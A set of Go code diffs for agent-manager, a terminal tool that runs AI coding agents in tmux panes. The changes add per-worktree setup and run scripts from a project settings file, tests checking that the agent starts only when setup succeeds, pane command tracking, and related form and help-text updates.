+func TestSetupCommandWithoutSetupIsTheAgentAlone(t *testing.T) {
+	if got := SetupCommand("  ", "claude"); got != "claude" {
+		t.Fatalf("SetupCommand = %q, want the agent command untouched", got)
+	}
+}
+
+func TestSetupCommandRunsTheAgentOnlyOnSuccess(t *testing.T) {
+	got := SetupCommand("npm install", "claude")
+	if !strings.Contains(got, "npm install") {
+		t.Fatalf("setup missing from %q", got)
+	}
+	if !strings.Contains(got, "claude") {
+		t.Fatalf("agent should run on success, got %q", got)
+	}
+	// The failure branch must not reach the agent, and must leave a shell.
+	_, failure, ok := strings.Cut(got, "else")
+	if !ok {
+		t.Fatalf("no failure branch in %q", got)
+	}
+	if strings.Contains(failure, "claude") {
+		t.Fatal("the agent must not start when setup fails")
+	}
+	if !strings.Contains(failure, "setup failed") {
+		t.Fatalf("failure branch should say so, got %q", failure)
+	}
+	// Neither branch may exec: the launch script's own trailing exec is what
+	// leaves a prompt in the pane, and exec'ing here would take it away.
+	if strings.Contains(got, "exec ") {
+		t.Fatalf("SetupCommand must not exec, got %q", got)
+	}
+}
+
+// A pane with no agent still needs a command in the success branch; an empty
+// one is a syntax error the pane would die on.
+func TestSetupCommandStaysValidWithNoAgent(t *testing.T) {
+	got := SetupCommand("make deps", "")
+	if !strings.Contains(got, "then\n:\n") {
+		t.Fatalf("success branch should be a no-op, got %q", got)
+	}
+	if out, err := runShell(t, t.TempDir(), got); err != nil {
+		t.Fatalf("generated command does not parse: %v (%s)", err, out)
+	}
+}
+
+// The wrapper is handed to a real shell, so it has to actually parse and
+// branch the way the string suggests.
+func TestSetupCommandExecutes(t *testing.T) {
+	dir := t.TempDir()
+	marker := filepath.Join(dir, "ran")
+
+	script := SetupCommand("touch "+marker, "true")
+	if out, err := runShell(t, dir, script); err != nil {
+		t.Fatalf("success path failed: %v (%s)", err, out)
+	}
+	if _, err := os.Stat(marker); err != nil {
+		t.Fatalf("setup did not run: %v", err)
+	}
+
+	// A failing setup must report and not reach the agent command.
+	failing := SetupCommand("false", "touch "+filepath.Join(dir, "agent-ran"))
+	out, err := runShell(t, dir, failing)
+	if err != nil {
+		t.Fatalf("failure path should still exit cleanly: %v (%s)", err, out)
+	}
+	if !strings.Contains(out, "setup failed") {
+		t.Fatalf("failure path should say so, got %q", out)
+	}
+	if _, err := os.Stat(filepath.Join(dir, "agent-ran")); err == nil {
+		t.Fatal("the agent command ran despite setup failing")
+	}
+}

--- a/internal/tmux/tmux.go
+++ b/internal/tmux/tmux.go
@@ -217,6 +217,14 @@ func ShellQuote(s string) string {
 	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
 }
 
+// envCommand prefixes a launch line with the variables the pane needs.
+//
+// They are exported on their own lines rather than assigned inline, because
+// a command is not always the single simple command the inline form covers:
+// a project's run script is a shell snippet, and `K=v foo && bar` would
+// leave bar without it and expand a `$K` inside foo before the assignment
+// ever took effect. Exporting also carries them into the shell the launch
+// script exec's afterwards, so a pane that drops to a prompt keeps them.
 func envCommand(env map[string]string, command string) string {
 	keys := make([]string, 0, len(env))
 	for key := range env {
@@ -225,7 +233,7 @@ func envCommand(env map[string]string, command string) string {
 	sort.Strings(keys)
 	var line strings.Builder
 	for _, key := range keys {
-		line.WriteString(key + "=" + ShellQuote(env[key]) + " ")
+		line.WriteString("export " + key + "=" + ShellQuote(env[key]) + "\n")
 	}
 	line.WriteString(command)
 	return line.String()

--- a/internal/tmux/tmux.go
+++ b/internal/tmux/tmux.go
@@ -555,19 +555,28 @@ func noServer(out string) bool {
 		strings.Contains(out, "error connecting to")
 }
 
-// Panes returns every managed session's pane pid in a single tmux call,
-// which doubles as a liveness check: a session absent from the map is gone.
-func (d *Driver) Panes() (map[string]int, error) {
-	out, err := exec.Command(d.bin, d.args("list-panes", "-a", "-F", "#{session_name} #{pane_pid}")...).CombinedOutput()
+// Pane is what one managed session's pane is doing: its pid, and the
+// command in the foreground. The command tells a shell sitting at a prompt
+// apart from one running something, which is the only signal there is that a
+// run script is still alive — a shell has no turns to track.
+type Pane struct {
+	PID     int
+	Command string
+}
+
+// Panes returns every managed session's pane in a single tmux call, which
+// doubles as a liveness check: a session absent from the map is gone.
+func (d *Driver) Panes() (map[string]Pane, error) {
+	out, err := exec.Command(d.bin, d.args("list-panes", "-a", "-F", "#{session_name} #{pane_pid} #{pane_current_command}")...).CombinedOutput()
 	if err != nil {
 		if noServer(string(out)) {
-			return map[string]int{}, nil
+			return map[string]Pane{}, nil
 		}
 		return nil, fmt.Errorf("tmux list-panes: %w: %s", err, strings.TrimSpace(string(out)))
 	}
-	panes := map[string]int{}
+	panes := map[string]Pane{}
 	for _, line := range strings.Split(strings.TrimSpace(string(out)), "\n") {
-		name, pidText, ok := strings.Cut(line, " ")
+		name, rest, ok := strings.Cut(line, " ")
 		if !ok || !strings.HasPrefix(name, prefix) {
 			continue
 		}
@@ -575,8 +584,11 @@ func (d *Driver) Panes() (map[string]int, error) {
 		if _, taken := panes[id]; taken {
 			continue
 		}
+		// The command may be absent on a pane tmux is still setting up, so
+		// the split is tolerant rather than required.
+		pidText, command, _ := strings.Cut(rest, " ")
 		if pid, err := strconv.Atoi(pidText); err == nil {
-			panes[id] = pid
+			panes[id] = Pane{PID: pid, Command: command}
 		}
 	}
 	return panes, nil

--- a/internal/tmux/tmux_test.go
+++ b/internal/tmux/tmux_test.go
@@ -705,7 +705,7 @@ func TestLifecycle(t *testing.T) {
 	if err != nil {
 		t.Fatalf("Panes: %v", err)
 	}
-	if panes[id] <= 0 {
+	if panes[id].PID <= 0 {
 		t.Fatalf("Panes should map %q to a pane pid, got %v", id, panes)
 	}
 

--- a/internal/ui/editor.go
+++ b/internal/ui/editor.go
@@ -66,19 +66,29 @@ func (m *Model) openEditor() (tea.Model, tea.Cmd) {
 		m.errBar.text = "directory no longer exists: " + dir
 		return m, nil
 	}
+	m.errBar.text = ""
+	return m.openInEditor(dir)
+}
+
+// openInEditor launches the configured editor on a path: the row's directory
+// for o, or a single file for the project settings p scaffolds. Editors take
+// either, so the only difference is what is appended to the command line.
+//
+// Any message already on the status bar is left alone, since a caller may
+// have put an outcome there that outlives the launch.
+func (m *Model) openInEditor(target string) (tea.Model, tea.Cmd) {
 	line := m.resolveEditor()
-	cmd, ok := editorCommand(line, dir)
+	cmd, ok := editorCommand(line, target)
 	if !ok {
 		m.errBar.text = `no editor found: set editor = "code" in config.toml`
 		return m, nil
 	}
-	m.errBar.text = ""
 	if !detachedEditors[editorName(line)] {
 		return m, tea.ExecProcess(cmd, func(err error) tea.Msg {
 			return editorDoneMsg{err: err, tookScreen: true}
 		})
 	}
-	return m, startEditorCmd(cmd, editorName(line), dir)
+	return m, startEditorCmd(cmd, editorName(line), target)
 }
 
 // Starting a process is exec, which Update must not do: a slow launch

--- a/internal/ui/form.go
+++ b/internal/ui/form.go
@@ -600,6 +600,21 @@ func (m *Model) spawnSession(toolName, name, dir, group, prompt string, autoName
 	deferDirective := autoNamed && !directiveEmbeddable(prompt)
 	prompt = launchPrompt(prompt, autoNamed)
 	base := withPrompt(tool, tool.Command, prompt)
+	// A worktree is a fresh checkout: whatever the project needs that git does
+	// not track — installed dependencies, an .env, generated files — is not
+	// there yet, and an agent started into that tree spends its first turn on
+	// errors that are not the code's. The setup script runs in the pane ahead
+	// of the agent so its output is visible and a failure holds the pane.
+	launchEnv, setup := map[string]string(nil), ""
+	if worktree {
+		settings, err := m.projectSettings(dir, worktreeRepo)
+		if err != nil {
+			m.discardWorktree(worktreeRepo, dir, worktreeBranch)
+			return err
+		}
+		setup = settings.Setup
+		launchEnv = settings.Env(filepath.Base(dir))
+	}
 	var pendingInputs []string
 	if tool.PromptMode == "send" {
 		if prompt != "" {
@@ -633,6 +648,8 @@ func (m *Model) spawnSession(toolName, name, dir, group, prompt string, autoName
 		PendingInputs:  pendingInputs,
 	}, tool, base, launchOptions{
 		rollbackWorktree: worktreeRepo != "",
+		env:              launchEnv,
+		setup:            setup,
 	}); err != nil {
 		return err
 	}

--- a/internal/ui/form.go
+++ b/internal/ui/form.go
@@ -624,7 +624,8 @@ func (m *Model) spawnSession(toolName, name, dir, group, prompt string, autoName
 	// there yet, and an agent started into that tree spends its first turn on
 	// errors that are not the code's. The setup script runs in the pane ahead
 	// of the agent so its output is visible and a failure holds the pane.
-	launchEnv, setup := map[string]string(nil), ""
+	launchEnv, setup, marker := map[string]string(nil), "", ""
+	var autoRuns project.Settings
 	if worktree {
 		settings, err := m.projectSettings(dir, worktreeRepo)
 		if err != nil {
@@ -632,6 +633,10 @@ func (m *Model) spawnSession(toolName, name, dir, group, prompt string, autoName
 			return err
 		}
 		setup = settings.Setup
+		if setup != "" {
+			marker = project.SetupMarker(dir)
+		}
+		autoRuns = settings
 		launchEnv = settings.Env(filepath.Base(dir))
 	}
 	var pendingInputs []string
@@ -669,9 +674,14 @@ func (m *Model) spawnSession(toolName, name, dir, group, prompt string, autoName
 		rollbackWorktree: worktreeRepo != "",
 		env:              launchEnv,
 		setup:            setup,
+		setupMarker:      marker,
 	}); err != nil {
 		return err
 	}
+	// Auto-run scripts start after the session exists, so a failure to spawn
+	// the agent is not compounded by servers left running for a worktree
+	// that never got one. Each waits on the setup marker in its own pane.
+	m.startAutoRuns(autoRuns, dir, group)
 	// The directive went out with the launch, so the row waits for the name
 	// the agent picks instead of showing the one generated for it.
 	if autoNamed {

--- a/internal/ui/form.go
+++ b/internal/ui/form.go
@@ -10,6 +10,7 @@ import (
 	"github.com/YoanWai/agent-manager/internal/config"
 	"github.com/YoanWai/agent-manager/internal/hooks"
 	"github.com/YoanWai/agent-manager/internal/mcpreg"
+	"github.com/YoanWai/agent-manager/internal/project"
 	"github.com/YoanWai/agent-manager/internal/status"
 	"github.com/YoanWai/agent-manager/internal/store"
 	"github.com/YoanWai/agent-manager/internal/tmux"
@@ -35,6 +36,8 @@ const (
 	gfParent
 	gfPath
 	gfWorktree
+	gfSetup
+	gfRun
 	gfCount
 )
 
@@ -87,6 +90,22 @@ type groupForm struct {
 	pathAuto      bool
 	worktreeIndex int
 	focus         int
+	// setup and run author the project's .agent-manager/settings.toml, which
+	// is where a project says how to bootstrap a worktree and what to run in
+	// it. Setting up the project is exactly when that is known, so it is
+	// asked here rather than left to a file the reader has to find.
+	setup textinput.Model
+	run   textinput.Model
+	// settingsPath is where the two fields would be written, and
+	// settingsExist marks a project that already has a file. An existing one
+	// is shown but not edited: rewriting it from a form would have to
+	// preserve comments, key order and blocks the form has no field for.
+	settingsPath  string
+	settingsExist bool
+	// settingsFilled marks fields holding a file's values rather than typed
+	// ones, so retargeting the path at a project without settings clears the
+	// previous project's answers instead of offering them as this one's.
+	settingsFilled bool
 }
 
 // sessionLabel renders a session's identity for the tmux status bar.
@@ -719,9 +738,12 @@ func (m *Model) openGroupForm() {
 		path:     textField("default working directory", 400),
 		pathAuto: true,
 		focus:    gfName,
+		setup:    textField("npm ci  (optional)", 400),
+		run:      textField("npm run dev  (optional)", 400),
 	}
 	m.rebuildGroupOptions(m.contextGroup())
 	m.groupForm.path.SetValue(m.groupDefaultDir(m.selectedGroupPath()))
+	m.syncGroupSettings()
 	m.syncGroupFormFieldWidths()
 	m.pathSugg.reset()
 	m.mode = modeGroupForm
@@ -748,6 +770,14 @@ func (m *Model) handleGroupFormKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 	case "shift+tab":
 		m.groupFormFocus(-1)
 		return m, nil
+	case "e":
+		// Only on the read-only settings rows: anywhere else e is a letter
+		// the reader is typing into a field.
+		if m.groupForm.settingsExist &&
+			(m.groupForm.focus == gfSetup || m.groupForm.focus == gfRun) {
+			m.mode = modeList
+			return m.openInEditor(m.groupForm.settingsPath)
+		}
 	case "up":
 		if pathSuggesting {
 			if !m.pathSugg.move(-1) {
@@ -797,6 +827,14 @@ func (m *Model) handleGroupFormKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 	switch m.groupForm.focus {
 	case gfName:
 		m.groupForm.name, cmd = m.groupForm.name.Update(msg)
+	case gfSetup:
+		if !m.groupForm.settingsExist {
+			m.groupForm.setup, cmd = m.groupForm.setup.Update(msg)
+		}
+	case gfRun:
+		if !m.groupForm.settingsExist {
+			m.groupForm.run, cmd = m.groupForm.run.Update(msg)
+		}
 	case gfPath:
 		m.groupForm.path, cmd = m.groupForm.path.Update(msg)
 		m.groupForm.pathAuto = false
@@ -810,12 +848,57 @@ func (m *Model) groupFormFocus(delta int) {
 	m.groupForm.focus = (m.groupForm.focus + delta + gfCount) % gfCount
 	m.groupForm.name.Blur()
 	m.groupForm.path.Blur()
+	m.groupForm.setup.Blur()
+	m.groupForm.run.Blur()
+	// A path just typed may have moved the form to a different repository,
+	// so what the settings fields show is resolved on every move rather than
+	// once at open.
+	m.syncGroupSettings()
 	switch m.groupForm.focus {
 	case gfName:
 		m.groupForm.name.Focus()
 	case gfPath:
 		m.groupForm.path.Focus()
+	case gfSetup:
+		if !m.groupForm.settingsExist {
+			m.groupForm.setup.Focus()
+		}
+	case gfRun:
+		if !m.groupForm.settingsExist {
+			m.groupForm.run.Focus()
+		}
 	}
+}
+
+// syncGroupSettings points the settings fields at whatever repository the
+// path field currently names, and fills them from a file that is already
+// there. A project with settings shows what it has rather than an empty box
+// that would read as "this project has none".
+func (m *Model) syncGroupSettings() {
+	path, ok := resolveExistingDir(m.groupForm.path.Value(), m.groupDefaultDir(m.selectedGroupPath()))
+	if !ok {
+		m.groupForm.settingsPath, m.groupForm.settingsExist = "", false
+		return
+	}
+	root := m.repoRootOf(path)
+	m.groupForm.settingsPath = project.SettingsPath(root)
+	settings, err := project.Load(root, root)
+	m.groupForm.settingsExist = err == nil && settings.Found
+	if !m.groupForm.settingsExist {
+		if m.groupForm.settingsFilled {
+			m.groupForm.setup.SetValue("")
+			m.groupForm.run.SetValue("")
+			m.groupForm.settingsFilled = false
+		}
+		return
+	}
+	m.groupForm.setup.SetValue(firstLine(settings.Setup))
+	if name, ok := settings.DefaultRun(); ok {
+		m.groupForm.run.SetValue(firstLine(settings.Run[name].Command))
+	} else {
+		m.groupForm.run.SetValue("")
+	}
+	m.groupForm.settingsFilled = true
 }
 
 func (m *Model) submitGroupForm() (tea.Model, tea.Cmd) {
@@ -836,6 +919,14 @@ func (m *Model) submitGroupForm() (tea.Model, tea.Cmd) {
 		return m, nil
 	}
 	worktree := groupWorktreeValue(m.groupForm.worktreeIndex)
+	// Written before the group exists: a settings file that cannot be
+	// written is worth refusing the whole creation over, since the reader
+	// typed those commands expecting them to be what the project runs.
+	written, err := m.writeGroupSettings(path)
+	if err != nil {
+		m.errBar.text = err.Error()
+		return m, nil
+	}
 	if err := m.store.AddGroup(full, path, worktree); err != nil {
 		m.errBar.text = err.Error()
 		return m, nil
@@ -863,6 +954,9 @@ func (m *Model) submitGroupForm() (tea.Model, tea.Cmd) {
 	m.hideEmptyGroups = false
 	m.statusFilter = statusFilterAll
 	m.errBar.text = ""
+	if written != "" {
+		m.reportDone("wrote " + written)
+	}
 	m.mode = modeList
 	m.rebuildRows()
 	for i, row := range m.rows {

--- a/internal/ui/form_test.go
+++ b/internal/ui/form_test.go
@@ -11,6 +11,7 @@ import (
 
 	"github.com/YoanWai/agent-manager/internal/config"
 	"github.com/YoanWai/agent-manager/internal/hooks"
+	"github.com/YoanWai/agent-manager/internal/project"
 	tea "github.com/charmbracelet/bubbletea"
 	"github.com/charmbracelet/x/ansi"
 )
@@ -838,5 +839,86 @@ func TestGroupFormStoresWorktreeChoice(t *testing.T) {
 	}
 	if len(groups) != 1 || groups[0].Worktree != "on" {
 		t.Fatalf("group form should store the worktree choice, got %+v", groups)
+	}
+}
+
+// projectSettingsDir writes a settings file into a repository, so a spawn
+// test reads as "a project configured like this".
+func projectSettingsDir(t *testing.T, root, body string) {
+	t.Helper()
+	dir := filepath.Join(root, project.Dir)
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(dir, project.File), []byte(body), 0o644); err != nil {
+		t.Fatalf("write settings: %v", err)
+	}
+}
+
+// A worktree is a checkout of a commit, so a settings file written but not
+// yet committed is not in it — exactly the state a project is in the first
+// time anyone tries this. The spawn falls back to the repository the
+// worktree branched from so that first attempt works.
+func TestWorktreeSpawnFallsBackToUncommittedSourceSettings(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	// Committed first, so the worktree checkout is a real one; the settings
+	// are written afterwards and deliberately left uncommitted.
+	initGitRepo(t, repo)
+	projectSettingsDir(t, repo, "setup = \"touch fallback-ran\"\n")
+
+	if err := m.spawnSession("claude", "wt-fallback", repo, "", "", false, true); err != nil {
+		t.Fatalf("spawn: %v", err)
+	}
+	sessions, err := m.store.ListSessions(true)
+	if err != nil {
+		t.Fatalf("list: %v", err)
+	}
+	if _, err := os.Stat(filepath.Join(sessions[0].Cwd, project.Dir, project.File)); err == nil {
+		t.Fatal("settings were committed; this no longer covers the fallback")
+	}
+	marker := filepath.Join(sessions[0].Cwd, "fallback-ran")
+	deadline := time.Now().Add(10 * time.Second)
+	for time.Now().Before(deadline) {
+		if _, err := os.Stat(marker); err == nil {
+			return
+		}
+		time.Sleep(50 * time.Millisecond)
+	}
+	t.Fatalf("uncommitted setup never ran in the worktree (%s)", marker)
+}
+
+// Settings that will not parse must not leave a worktree and a branch behind
+// for a session that was never created.
+func TestWorktreeSpawnWithBrokenSettingsDiscardsTheWorktree(t *testing.T) {
+	m := buildModel(t)
+	repo := filepath.Join(t.TempDir(), "repo")
+	if err := os.MkdirAll(repo, 0o755); err != nil {
+		t.Fatal(err)
+	}
+	initGitRepo(t, repo)
+	projectSettingsDir(t, repo, "port_base = 70000\n")
+
+	err := m.spawnSession("claude", "wt-broken", repo, "", "", false, true)
+	if err == nil {
+		t.Fatal("a spawn with unloadable settings should fail")
+	}
+	if !strings.Contains(err.Error(), "port_base") {
+		t.Fatalf("error should name the offending setting, got %v", err)
+	}
+
+	sessions, listErr := m.store.ListSessions(true)
+	if listErr != nil {
+		t.Fatalf("list: %v", listErr)
+	}
+	if len(sessions) != 0 {
+		t.Fatalf("a session was created despite the failure: %+v", sessions)
+	}
+	worktree := filepath.Join(filepath.Dir(repo), filepath.Base(repo)+"-worktrees", "wt-broken")
+	if _, statErr := os.Stat(worktree); statErr == nil {
+		t.Fatalf("the worktree was left behind at %s", worktree)
 	}
 }

--- a/internal/ui/help.go
+++ b/internal/ui/help.go
@@ -84,7 +84,7 @@ func helpSections() []helpSection {
 			{"r", "rename it, and re-pick its tool"},
 			{"m", "move it to another group"},
 			{"o", "open its working directory in your editor"},
-			{"O", "open what this worktree serves in a browser"},
+			{"O", "show what it runs: its server in a browser, or a TUI's pane"},
 			{"R", "restart it on an empty context (same name, group, dir, tool)"},
 			{"x / X", "kill it / kill every live session (frees their RAM)"},
 			{"v / V", "revive it / revive every dead session (resumes the agent)"},

--- a/internal/ui/help.go
+++ b/internal/ui/help.go
@@ -60,7 +60,7 @@ func helpSections() []helpSection {
 			{"K / J", "reorder the row up / down (shift+↑↓ too)"},
 			{"n", "new session"},
 			{"T", "new terminal tab: a shell in the group under the cursor"},
-			{"p", "run a project script, or create the settings file if there is none"},
+			{"p", "run a project script; creates or opens .agent-manager/settings.toml"},
 			{"g", "new group (name, parent, default path, worktree)"},
 			{"/", "search the list by name"},
 			{"w", "filter to what needs attention (waiting, finished, errored)"},

--- a/internal/ui/help.go
+++ b/internal/ui/help.go
@@ -84,6 +84,7 @@ func helpSections() []helpSection {
 			{"r", "rename it, and re-pick its tool"},
 			{"m", "move it to another group"},
 			{"o", "open its working directory in your editor"},
+			{"O", "open what this worktree serves in a browser"},
 			{"R", "restart it on an empty context (same name, group, dir, tool)"},
 			{"x / X", "kill it / kill every live session (frees their RAM)"},
 			{"v / V", "revive it / revive every dead session (resumes the agent)"},

--- a/internal/ui/help.go
+++ b/internal/ui/help.go
@@ -60,7 +60,7 @@ func helpSections() []helpSection {
 			{"K / J", "reorder the row up / down (shift+↑↓ too)"},
 			{"n", "new session"},
 			{"T", "new terminal tab: a shell in the group under the cursor"},
-			{"p", "run a project script from .agent-manager/settings.toml"},
+			{"p", "run a project script, or create the settings file if there is none"},
 			{"g", "new group (name, parent, default path, worktree)"},
 			{"/", "search the list by name"},
 			{"w", "filter to what needs attention (waiting, finished, errored)"},

--- a/internal/ui/help.go
+++ b/internal/ui/help.go
@@ -60,6 +60,7 @@ func helpSections() []helpSection {
 			{"K / J", "reorder the row up / down (shift+↑↓ too)"},
 			{"n", "new session"},
 			{"T", "new terminal tab: a shell in the group under the cursor"},
+			{"p", "run a project script from .agent-manager/settings.toml"},
 			{"g", "new group (name, parent, default path, worktree)"},
 			{"/", "search the list by name"},
 			{"w", "filter to what needs attention (waiting, finished, errored)"},
@@ -113,6 +114,7 @@ func helpSections() []helpSection {
 		{title: "inside a session (attached or focused)", rows: [][2]string{
 			{"typing", "goes straight to the agent, q included"},
 			{"ctrl+q", "back to the manager (ctrl+\\ too)"},
+			{"esc esc", "focused: back to the manager, one esc still interrupts"},
 			{"←", "focused: back to the manager, at the prompt's start"},
 			{"ctrl+r", "review the session's diff, esc returns"},
 			{"ctrl+o", "open its directory in an editor"},

--- a/internal/ui/help_test.go
+++ b/internal/ui/help_test.go
@@ -43,7 +43,7 @@ var helpDocumentedBy = map[string]string{
 	"shift+up": "K", "shift+down": "J",
 	"shift+k": "K", "shift+j": "J", "shift+a": "A", "shift+v": "V",
 	"shift+r": "R", "shift+x": "X", "shift+f": "F", "shift+m": "M",
-	"shift+t": "T",
+	"shift+t": "T", "shift+o": "O",
 	// Ctrl+C quits from every mode, so it belongs to no one context.
 	"ctrl+c": "q",
 }

--- a/internal/ui/keys.go
+++ b/internal/ui/keys.go
@@ -162,6 +162,8 @@ func (m *Model) handleKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 		return m.runKey()
 	case "o":
 		return m.openEditor()
+	case "O", "shift+o":
+		return m.openKey()
 	case "e":
 		return m, m.toggleEmptyGroups()
 	case "/":

--- a/internal/ui/keys.go
+++ b/internal/ui/keys.go
@@ -54,6 +54,8 @@ func (m *Model) handleKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 		return m.handleRepoPickKey(msg)
 	case modeRunPick:
 		return m.handleRunPickKey(msg)
+	case modeRunInit:
+		return m.handleRunInitKey(msg)
 	case modeGroupForm:
 		return m.handleGroupFormKey(msg)
 	case modeDiff:

--- a/internal/ui/keys.go
+++ b/internal/ui/keys.go
@@ -52,6 +52,8 @@ func (m *Model) handleKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 		return m.handleMoveKey(msg)
 	case modeRepoPick:
 		return m.handleRepoPickKey(msg)
+	case modeRunPick:
+		return m.handleRunPickKey(msg)
 	case modeGroupForm:
 		return m.handleGroupFormKey(msg)
 	case modeDiff:
@@ -154,6 +156,8 @@ func (m *Model) handleKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 		m.requestRefresh()
 	case "T", "shift+t":
 		return m.terminalKey()
+	case "p":
+		return m.runKey()
 	case "o":
 		return m.openEditor()
 	case "e":

--- a/internal/ui/lifecycle.go
+++ b/internal/ui/lifecycle.go
@@ -409,7 +409,7 @@ func (m *Model) liveSessions(sessions []store.Session) ([]store.Session, error) 
 	}
 	var live []store.Session
 	for _, sess := range sessions {
-		if panes[sess.ID] > 0 {
+		if panes[sess.ID].PID > 0 {
 			live = append(live, sess)
 		}
 	}
@@ -709,10 +709,16 @@ func (m *Model) handleConfirmKey(msg tea.KeyMsg) (tea.Model, tea.Cmd) {
 						m.errBar.text = "worktree cleanup: " + err.Error()
 					} else if used {
 						m.errBar.text = "worktree kept (used by another session): " + sess.Cwd
-					} else if removed, err := m.gitDrv.RemoveWorktreeIfClean(sess.WorktreeRepo, sess.Cwd, sess.WorktreeBranch); err != nil {
-						m.errBar.text = "worktree cleanup: " + err.Error()
-					} else if !removed {
-						m.errBar.text = "worktree kept (has work): " + sess.Cwd
+					} else {
+						// Last chance to reach whatever the setup script
+						// created outside this directory: the directory is
+						// about to stop existing.
+						m.archiveWorktree(sess.Cwd, sess.WorktreeRepo)
+						if removed, err := m.gitDrv.RemoveWorktreeIfClean(sess.WorktreeRepo, sess.Cwd, sess.WorktreeBranch); err != nil {
+							m.errBar.text = "worktree cleanup: " + err.Error()
+						} else if !removed {
+							m.errBar.text = "worktree kept (has work): " + sess.Cwd
+						}
 					}
 				}
 			}

--- a/internal/ui/listview.go
+++ b/internal/ui/listview.go
@@ -494,6 +494,10 @@ func (m *Model) renderTreeRow(entry treeRow, selected bool, width, index int, bg
 // gone still has to say so.
 func (m *Model) sessionGlyph(sess store.Session) string {
 	resting := sess.Status != status.Dead && sess.Status != status.Errored
+	if resting && m.sessionRunning(sess) {
+		frame := waveFrames[m.wavePhase%len(waveFrames)]
+		return lipgloss.NewStyle().Foreground(colorAccent).Render(string(frame))
+	}
 	if resting && m.isShell(sess.Tool) && !m.pinnedShell(sess) {
 		return subtleStyle.Render(shellGlyph)
 	}

--- a/internal/ui/modals.go
+++ b/internal/ui/modals.go
@@ -242,10 +242,14 @@ func (m *Model) viewGroupForm() string {
 	}
 	worktreeVal := subtleStyle.Render("◂ ") + valueStyle.Render(groupWorktreeOptions[m.groupForm.worktreeIndex]) + subtleStyle.Render(" ▸")
 	b.WriteString(formField("worktree", worktreeVal, m.groupForm.focus == gfWorktree))
+	b.WriteString(m.viewGroupSettingsFields())
 	if m.groupForm.focus == gfParent {
 		b.WriteString("\n" + m.viewGroupPicker())
 	}
 	hint := [][2]string{{"tab/↑↓", "move"}, {"↵", "create"}, {"esc", "cancel"}}
+	if m.groupForm.settingsExist && (m.groupForm.focus == gfSetup || m.groupForm.focus == gfRun) {
+		hint = [][2]string{{"tab/↑↓", "move"}, {"e", "open settings.toml"}, {"↵", "create"}, {"esc", "cancel"}}
+	}
 	if m.groupForm.focus == gfParent {
 		hint = [][2]string{{"←→", "pick parent"}, {"tab/↑↓", "move"}, {"↵", "create"}, {"esc", "cancel"}}
 	}
@@ -464,4 +468,42 @@ func formField(label, value string, focused bool) string {
 		b.WriteString(strings.Repeat(" ", formLabelColumn) + line + "\n")
 	}
 	return b.String()
+}
+
+// viewGroupSettingsFields renders the two questions that author a project's
+// settings file. A project that already has one shows what it says, marked
+// read-only rather than hidden: knowing a setup script is already there is
+// worth more than a blank field, which would read as "there is none".
+func (m *Model) viewGroupSettingsFields() string {
+	if m.groupForm.settingsPath == "" {
+		return ""
+	}
+	var b strings.Builder
+	if m.groupForm.settingsExist {
+		setup, run := m.groupForm.setup.Value(), m.groupForm.run.Value()
+		b.WriteString(formField("setup", existingSetting(setup), m.groupForm.focus == gfSetup))
+		b.WriteString(formField("run", existingSetting(run), m.groupForm.focus == gfRun))
+		if m.groupForm.focus == gfSetup || m.groupForm.focus == gfRun {
+			b.WriteString(subtleStyle.Render("  from "+m.groupForm.settingsPath) + "\n")
+		}
+		return b.String()
+	}
+	b.WriteString(formField("setup", m.groupForm.setup.View(), m.groupForm.focus == gfSetup))
+	b.WriteString(formField("run", m.groupForm.run.View(), m.groupForm.focus == gfRun))
+	if m.groupForm.focus == gfSetup {
+		b.WriteString(subtleStyle.Render("  runs in every new worktree, before its agent") + "\n")
+	}
+	if m.groupForm.focus == gfRun {
+		b.WriteString(subtleStyle.Render("  what p runs; $PORT is this worktree's own") + "\n")
+	}
+	return b.String()
+}
+
+// existingSetting renders a value already in the settings file, or says the
+// file leaves it unset.
+func existingSetting(value string) string {
+	if strings.TrimSpace(value) == "" {
+		return subtleStyle.Render("not set")
+	}
+	return mutedStyle.Render(value)
 }

--- a/internal/ui/model.go
+++ b/internal/ui/model.go
@@ -50,6 +50,9 @@ const (
 	// modeRunPick lists a project's run scripts when p cannot tell which one
 	// was meant.
 	modeRunPick
+	// modeRunInit offers to give a project its first settings file, on a p
+	// pressed in a repository that has none.
+	modeRunInit
 )
 
 type treeRow struct {
@@ -161,6 +164,7 @@ type Model struct {
 	movePath   string
 	repoPick   repoPickState
 	runPick    runPickState
+	runInit    runInitState
 	// editorReturnID is the session an editor request detached from, so the
 	// attach it cost can be resumed once the editor is up.
 	editorReturnID string

--- a/internal/ui/model.go
+++ b/internal/ui/model.go
@@ -47,6 +47,9 @@ const (
 	// modeFocus routes the keyboard into the selected session's pane while
 	// the list and live preview stay on screen.
 	modeFocus
+	// modeRunPick lists a project's run scripts when p cannot tell which one
+	// was meant.
+	modeRunPick
 )
 
 type treeRow struct {
@@ -157,6 +160,7 @@ type Model struct {
 	moveID     string
 	movePath   string
 	repoPick   repoPickState
+	runPick    runPickState
 	// editorReturnID is the session an editor request detached from, so the
 	// attach it cost can be resumed once the editor is up.
 	editorReturnID string

--- a/internal/ui/model.go
+++ b/internal/ui/model.go
@@ -201,6 +201,15 @@ type Model struct {
 	// the frame is not repainted forever.
 	bannerPhase int
 
+	// paneCommands is each session's foreground command as of the last poll,
+	// which is how a shell running something is told from one at a prompt.
+	paneCommands map[string]string
+	// wavePhase advances the run indicator on rows whose script is still
+	// going, and waving marks the tick as already scheduled so a poll cannot
+	// start a second one racing the first.
+	wavePhase int
+	waving    bool
+
 	// startupPhase advances the preview's launch loader. It rides the
 	// preview tick, which already runs at its fast cadence while a session
 	// is starting, rather than adding a timer of its own.
@@ -452,6 +461,9 @@ type refreshMsg struct {
 	procFor        string
 	preview        string
 	agents         agentStats
+	// paneCommands is each session's foreground command, carried on the poll
+	// that already asked tmux for it rather than costing a second call.
+	paneCommands map[string]string
 }
 
 type previewMsg struct {
